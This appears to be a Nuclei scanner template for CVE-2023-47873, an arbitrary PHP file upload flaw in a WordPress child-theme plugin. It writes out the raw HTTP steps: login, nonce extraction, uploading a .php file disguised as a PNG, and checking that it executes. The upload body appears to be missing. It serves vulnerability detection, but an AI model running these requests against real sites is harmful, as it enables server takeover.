id: CVE-2023-47873 info: name: WordPress WP Child Theme Generator < 1.1.3 - Arbitrary File Upload author: cysamu,Crux severity: critical description: | Unrestricted Upload of File with Dangerous Type vulnerability in WEN Solutions WP Child Theme Generator.This issue affects WP Child Theme Generator- from n/a through 1.0.9. impact: | Authenticated administrators can upload arbitrary PHP files disguised as theme files to execute malicious code on the WordPress server, enabling complete site compromise. remediation: Update to version 1.1.3 or later reference: - https://github.com/certuscyber/cve-pocs/tree/main/CVE-2023-47873 - https://patchstack.com/database/wordpress/plugin/wp-child-theme-generator/vulnerability/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability - https://en-ca.wordpress.org/plugins/wp-child-theme-generator/ - https://patchstack.com/database/vulnerability/wp-child-theme-generator/wordpress-wp-child-theme-generator-plugin-1-0-8-arbitrary-file-upload-vulnerability?_s_id=cve classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H cvss-score: 9.1 cve-id: CVE-2023-47873 cwe-id: CWE-434 epss-score: 0.02276 epss-percentile: 0.80965 cpe: cpe:2.3:a:wensolutions:wp_child_theme_generator:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 4 vendor: wensolutions product: wp_child_theme_generator framework: wordpress publicwww-query: "/wp-content/plugins/wp-child-theme-generator/" tags: cve,cve2023,wordpress,wp-plugin,wp,wp-child-theme-generator,file-upload,authenticated,intrusive,rce,vuln flow: http(1) && http(2) && http(3) && http(4) variables: string: "{{to_lower(rand_base(8))}}" name: '{{to_lower(rand_text_alpha(6))}}' childauthor: "{{to_lower(rand_base(4))}}" description: "{{to_lower(rand_base(5))}}" impact: | Authenticated administrators can upload arbitrary PHP files disguised as theme files to execute malicious code on the WordPress server, enabling complete site compromise. filename: '{{to_lower(rand_text_alpha(6))}}' http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded log={{username}}&pwd={{password}}&wp-submit=Log+In matchers: - type: dsl dsl: - 'len(body)==0' - 'status_code == 302' - 'contains(header, "wordpress_logged_in_")' condition: and internal: true - raw: - | GET /wp-admin/themes.php?page=custom-child-theme HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "Child Theme Gen")' condition: and internal: true extractors: - type: regex name: nonce group: 1 regex: - name="wp-easy-nonce" value="([0-9a-zA-Z]+)" part: body internal: true - raw: - | POST /wp-admin/admin-post.php HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=----geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="childtheme" {{name}} ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="childauthor" {{childauthor}} ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="description" {{description}} ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="fileUpload"; filename="{{filename}}.php" Content-Type: image/png ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="wp-easy-nonce" {{nonce}} ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="action" child_theme ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8 Content-Disposition: form-data; name="custom-child-create" Create Child Theme ------geckoformboundaryfbbbd275d3ea5d30b67d44817dde50f8-- matchers: - type: dsl dsl: - 'status_code == 302' - 'contains(location, "error_type=updated")' condition: and internal: true - raw: - | GET /wp-content/themes/{{name}}/screenshot.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{string}}")' condition: and # digest: 4a0a0047304502210095e3c6832c3dc8de8268d2a747b1c01bb4cce691b00dbf001cd0c6be84c7b882022006cf50c779ebda8f561bc05fbc3c4d60bec5ae1e5b949c20c29cfaa7fb3678e1:922c64590222798bb761d5b6d8e72950